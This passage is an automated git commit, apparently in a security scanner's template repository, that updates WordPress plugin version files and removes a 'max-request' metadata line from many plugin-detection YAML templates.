blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N From 6691114b4ec5bf2d296ada85a524259478a6c42e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 5 Jul 2023 04:02:07 +0000 Subject: [PATCH 376/609] Auto WordPress Plugins Update [Wed Jul 5 04:02:07 UTC 2023] :robot: --- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/header-footer-code-manager.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 3 +-- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 3 +-- .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 9 insertions(+), 209 deletions(-) diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index d4563d9c5d..4be2c727ad 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.4.7 \ No newline at end of file +6.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 11155dbeea..c9942a08a6 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -16.1.0 \ No newline at end of file +16.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt index 9b51125a6c..98924abee9 100644 --- a/helpers/wordpress/plugins/header-footer-code-manager.txt +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -1 +1 @@ -1.1.34 \ No newline at end of file +1.1.35 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index a7752bacf1..f1db28b209 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.20.0 \ No newline at end of file +4.20.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 47b080dc85..9c93823dd7 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.25 \ No newline at end of file +3.6.27 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 2151dbda1e..7d27289a3d 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.9.2 \ No newline at end of file +5.9.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 73c5170b31..f7e6aaa8b0 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.1.2 \ No newline at end of file +14.1.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml 